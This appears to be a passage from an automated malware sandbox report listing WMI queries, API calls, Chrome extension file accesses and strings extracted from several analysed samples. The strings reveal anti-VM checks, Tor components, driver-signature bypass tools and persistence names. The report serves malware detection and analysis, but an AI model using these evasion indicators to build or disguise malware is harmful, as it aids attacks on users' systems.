Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00402910 FindFirstFileW,	10_2_00402910
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_004068B4 FindFirstFileW,FindClose,	10_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	13_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_004068B4 FindFirstFileW,FindClose,	13_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00402910 FindFirstFileW,	13_2_00402910
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 21_2_004065CA FindFirstFileA,FindClose,	21_2_004065CA
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 21_2_004059F9 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	21_2_004059F9
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 21_2_004027AF FindFirstFileA,	21_2_004027AF
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00474060 FindFirstFileA,FindNextFileA,FindClose,	23_2_00474060
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004520C0 FindFirstFileA,GetLastError,	23_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004966E4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	23_2_004966E4
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004634F4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	23_2_004634F4
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00463970 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	23_2_00463970
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00461F68 FindFirstFileA,FindNextFileA,FindClose,	23_2_00461F68

Source: C:\Users\user\AppData\Local\Temp\tuc4.exe

Code function: 18_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

18_2_00409B30

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\C086.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: sbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--P
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: psapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= p
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
Source: etopt.exe, 00000019.00000002.2903789358.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899ntdllRtlGetNtVersionNumbersNtWow64DebuggerCallKernel32GetTickCount64advapi32MD4InitMD4UpdateMD4FinalMD5InitMD5UpdateMD5FinalA_SHAInitA_SHAUpdateA_SHAFinalRtlRandomRtlRandomExRtlComputeCrc32ZwQuerySystemInformationNtQueryInformationProcessNtQueryInformationThreadNtCreateThreadExkernel32ShlWapiPathAppendWPathCanonicalizeWPathCompactPathWPathCompactPathExWPathCommonPrefixWPathFindOnPathWPathGetCharTypeWPathIsContentTypeWPathAddBackslashWPathMakePrettyWPathMatchSpecWPathMatchSpecExWPathParseIconLocationWPathQuoteSpacesWPathRelativePathToWPathRemoveArgsWPathRemoveBlanksWPathRemoveExtensionWPathRemoveFileSpecWPathRenameExtensionWPathSearchAndQualifyWPathSetDlgItemPathWPathUnquoteSpacesWPathRemoveBackslashWPathIsDirectoryWPathAddExtensionWPathIsFileSpecWPathFileExistsWPathCombineWPathFindExtensionW :%s%sSHDeleteEmptyKeyWSHDeleteKeyWSHDeleteValueWSHGetValueWSHSetValueWSHQueryValueExWSHEnumKeyExWSHEnumValueWSHQueryInfoKeyWSHOpenRegStreamWmailto:://%huhttpsWinInetInternetOpenWInternetConnectWHttpOpenRequestWInternetQueryOptionWInternetSetOptionWHttpSendRequestWHttpSendRequestExWHttpEndRequestWHttpQueryInfoWFindFirstUrlCacheEntryWFindFirstUrlCacheEntryExWFindNextUrlCacheEntryWFindNextUrlCacheEntryExWGetUrlCacheEntryInfoWDeleteUrlCacheEntryWInternetReadFileInternetCloseHandleFindCloseUrlCacheMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/POSTIpHlpApiGetAdaptersAddressesVmwareBluetoothLoopbackGetSystemFirmwareTableROOT\CIMV2SELECT * FROM Win32_DiskDriveModelvmwareCaptionWS2_32socketbindclosesocketgetsocknamesendsendtorecvrecvfromselectgethostbynameWSAGetLastErrorWSACloseEventWSACreateEventWSAEventSelectacceptconnectgetaddrinfoWSAStartupWSACleanupWSASetEventWSAResetEventlistenWSAWaitForMultipleEventsWSAEnumNetworkEventsWSAConnectWSASendWSASendDisconnectWSARecvWSARecvDisconnectWSARecvFromWSASendTogetpeernamentohsntohlgetsockoptsetsockoptWSAIoctlGetAddrInfoExWhtonshtonlinet_addrWSASocketW%s\%uurlsReferer: http://news.qq.com
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: STAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00 %+v m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3ca
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie$WINDIR% CPU (%03d %s%v: %#x, goid=, j0 = -nologo/delete19531252.5.4.32.5.
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: ameNewaPINGPOSTPathQEMUROOTH
Source: explorer.exe, 00000001.00000000.1668045299.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1668045299.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, InstallSetup8.exe, 0000000D.00000002.3073092951.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2356147989.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 00000019.00000003.2785751263.0000000000540000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 00000019.00000003.2739843416.0000000000540000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 00000019.00000003.2425113770.000000000057B000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 00000019.00000003.2755917231.0000000000540000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 00000019.00000003.2759840753.0000000000540000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 00000019.00000002.2807922394.0000000000540000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 00000019.00000003.2749835330.0000000000540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: ersexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindo
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: popcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs
Source: explorer.exe, 00000001.00000000.1668573400.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: 11VBoxSFWINDIRWD
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000078B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8s}%SystemRoot%\system32\mswsock.dll
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: pclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: sse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BE
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: LycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd acceptactivechan<-closedcookiedirectdo
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: aryvmcixn-SR-%W
Source: explorer.exe, 00000001.00000000.1668573400.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s\|%s%s\|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
Source: explorer.exe, 00000001.00000000.1666612825.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: main.isRunningInsideVMWare
Source: explorer.exe, 00000001.00000000.1668045299.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: 4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max
Source: 4854.exe, 00000004.00000000.1898749556.0000000000C41000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: G2ZXIHQEmuD8Q5Lub4sK
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: rSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)
Source: nsa984B.tmp.exe, 0000001F.00000002.3077167175.0000000002435000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: explorer.exe, 00000001.00000000.1666612825.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
Source: nsa984B.tmp.exe, 0000001F.00000002.3077167175.0000000002435000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareO
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s%d%s/%s%s:%d%s=%s"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:**@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: tVMSrvcs\|!
Source: explorer.exe, 00000001.00000000.1668045299.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: 3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs
